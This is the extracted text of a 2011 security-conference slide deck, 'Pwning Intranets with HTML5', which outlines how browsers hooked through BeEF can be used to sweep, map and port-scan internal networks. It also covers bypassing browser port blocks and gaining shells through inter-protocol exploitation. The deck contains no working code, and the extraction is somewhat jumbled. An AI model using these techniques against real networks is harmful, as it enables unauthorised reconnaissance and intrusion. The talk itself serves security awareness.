Post on 05-Apr-2018
8/2/2019 Pawning Intranets HTML5
1/36
2009 IBM Corporation
Pwning Intranets with HTML5
Javier Marcos de Prado
Juan Galiana Lara
HashDays Security & Risk Conference 2011 2011 IBM Corporation
8/2/2019 Pawning Intranets HTML5
2/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation2
Agenda
How our attack works?
How we discover what is in your network?
What does your infrastructure tell us for free?
Diagrams your administrator want and wenow have
Inter-protocol communication
Demo
Conclusions
References and Links
8/2/2019 Pawning Intranets HTML5
3/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation3
How our attack works?
8/2/2019 Pawning Intranets HTML5
4/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation4
Attack vector
8/2/2019 Pawning Intranets HTML5
5/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation5
How we discover whatis in your network?
8/2/2019 Pawning Intranets HTML5
6/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation6
Why would you use HTML5?
HTML5 ~= HTML + JS + CSS
Backwards compatibility with HTML4
New tags in, old tags out
JavaScript APIs
Canvas, WebGL, geolocation, native media support
Cross-Domain communication
You will have to eventually
8/2/2019 Pawning Intranets HTML5
7/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation7
Why would we use HTML5?
HTML5 ~= HTML + JS + CSS
WebSockets
CORS
WebWorkersJavascript APIs
8/2/2019 Pawning Intranets HTML5
8/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation8
What is BeEF?
BeEF: Browser Exploitation Framework
Brought to public by Wade Alcorn in 2005
Powerful tool to squeeze XSS attacks, owningcompletely the client (victim) machine and providinga complete C&C
Different modules to attack in real time:OS/Browser/plugins information, opened sessions,visited links, custom JS...
Great to scare people who think that XSS is a popup!
8/2/2019 Pawning Intranets HTML5
9/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation9
HTML5 + BeEF
The attack can be triggered by:
Spot a victim with access to the Intranet
Trick victim to visit a malicious website
Follow a link: url shorteners, twitter,facebook...
Phishing
Cross-Site-Scripting BeEF as Command & Control for hooked victims
Our HTML5 code will run through BeEF in the victim
8/2/2019 Pawning Intranets HTML5
10/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation10
What does yourinfrastructure tell us forfree?
8/2/2019 Pawning Intranets HTML5
11/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation11
Using a technique known as
footprinting
We want ...
Locate network range Identify active machines
Unearth internal hostnames
Discover open ports
Detect operating systems Uncover services on ports
Map the network
8/2/2019 Pawning Intranets HTML5
12/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation12
Toolkit: Modules in BeEF
Control Panel to managehooked browsers
Comes out of the box witha set of Modules
You can develop and add
your own module!
8/2/2019 Pawning Intranets HTML5
13/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation13
Toolkit: Add your own module
8/2/2019 Pawning Intranets HTML5
14/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation14
Discover Internal Network
Get Network Settings
Get the local IP address of the
hooked browser
Know the internal networkthat the victim is connected
to
8/2/2019 Pawning Intranets HTML5
15/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation15
Ping
8/2/2019 Pawning Intranets HTML5
16/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation16
Discover internal addresses
Ping in JS without user interaction
8/2/2019 Pawning Intranets HTML5
17/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation17
Ping sweep
Discover active machinesin the intranet or
adjacent networks
Ping over a Class C network
Iterates the whole network ip
range
Example:
192.168.1.1-192.168.1.254
8/2/2019 Pawning Intranets HTML5
18/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation18
Intranet footprinting
Discover web servers inport 80 and 8080
Scans for Apache, IIS.. and known
Routers and Printers
It works trying to load known imagesresources and handling the onloadevent
What if there is an interesting host atintranet.company.com10.126.209.198?
8/2/2019 Pawning Intranets HTML5
19/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation19
DNS enumeration
Discover internal hostnames
Most important servers normally have a DNS associatedto their IP Address
If we try to resolve intranet in a web browserthe web browser will try to resolve
intranet.company.com
8/2/2019 Pawning Intranets HTML5
20/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation20
DNS enumeration
We can not resolve DNS in JavaScript
We can make cross-domain request with CrossOrigin Resource Sharing and WebSockets
Process of extracting hostnames using dictionaryand timing attacks
TODO: Run multiple threads in parallel withWebWorkers
Jump to adjacent networks, common hostnames areintranet, ftp, webmail....
8/2/2019 Pawning Intranets HTML5
21/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation21
DNS enumeration
Using a dictionary of possiblesubdomains is possible todiscover internal hostnames
8/2/2019 Pawning Intranets HTML5
22/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation22
Port Scanning
Analogy: Figure out what a building does by looking atthe door
Most known port scanner: Nmap
What information can I extract from port scanning? Basic OS Fingerprinting
Service probing
Filtered ports sometimes appear as open
Port filtered Firewall Juicy stuff!
INFORMATION INFORMATION INFORMATION
8/2/2019 Pawning Intranets HTML5
23/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation23
Port Scanning
Most intranets are not filtered FUN!
Finding services to kick off an APT
Basic port scanning: OPEN or CLOSED?
Classic approach: img/iframe src + JavaScript HTML5 approach: CORS and WebSockets + JavaScript
Problems? Firefox, WebSockets and CORS block knownports
Solution! Use a different protocol: ftp still rocks
Similar to basic TCP nmap scan:
Example: nmap -sT hostname -p PORT
8/2/2019 Pawning Intranets HTML5
24/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation24
Port Scanning: Beating
protections Blocking example for known ports:
(Firefox, WebSockets and CORS) http://example.com:22
Workaround! ftp://example.com:22
It works on Internet Explorer, Mozilla Firefox, Google Chromeand Safari
Based on timeouts, it can be configured
8/2/2019 Pawning Intranets HTML5
25/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation25
Port Scanning module
Scan can be performed using ranges, lists or single ports
Uses a mixed method to workaround security measures:ports blocked can be still scanned!
8/2/2019 Pawning Intranets HTML5
26/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation26
Diagrams youradministratorwants
8/2/2019 Pawning Intranets HTML5
27/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation27
Network Topology
All the previous techniques have been successfuland the pwnage is close...
What to do now? Show results!
All the information gathered previously, displayed ina nice format
Simple OS fingerprinting performed
Looks great on reports...
8/2/2019 Pawning Intranets HTML5
28/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation28
Network Topology
8/2/2019 Pawning Intranets HTML5
29/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation29
Inter-protocol
communication
8/2/2019 Pawning Intranets HTML5
30/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation30
Inter-protocol
Launch requests from a web
browser to non HTTP-based services
How? Playing with 'POST' forms
Using the multipart/form-data encoding type
Services will ignore lines like the http headersbut will execute the commands they understand
8/2/2019 Pawning Intranets HTML5
31/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation31
Inter-protocol: IRC
8/2/2019 Pawning Intranets HTML5
32/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation32
Inter-protocol: exploitation
Exploit vulnerabilities within theinternal network to gain control
Force the victim to send a request to the internal host
The vulnerability triggers and execute the shellcode
The shellcode launches a bind shell or back-connectshell to gain full-control to the remote machine
8/2/2019 Pawning Intranets HTML5
33/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation33
Inter-protocol: exploitation
8/2/2019 Pawning Intranets HTML5
34/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation34
Demo
8/2/2019 Pawning Intranets HTML5
35/36
HashDays Security & Risk Conference 2011 2011 IBM Corporation35
Conclusions
An attacker could get information from your network
As well could exploit and communicate to the network
Use No-script plugin for Firefox in order to protect!
Users are exposed to HTML5 features abuse each time
they visit a website
Browsers should block this kind of request by default
8/2/2019 Pawning Intranets HTML5
36/36
H hD S i & Ri k C f 2011 2011 IBM C i36
References and Links
OWASP
http://www.owasp.org
BeEf explotation framework
http://beefproject.com
Any query? Give us a shout!
@jgaliana @javutin
Thanks!
http://www.owasp.org/http://beefproject.com/http://beefproject.com/http://www.owasp.org/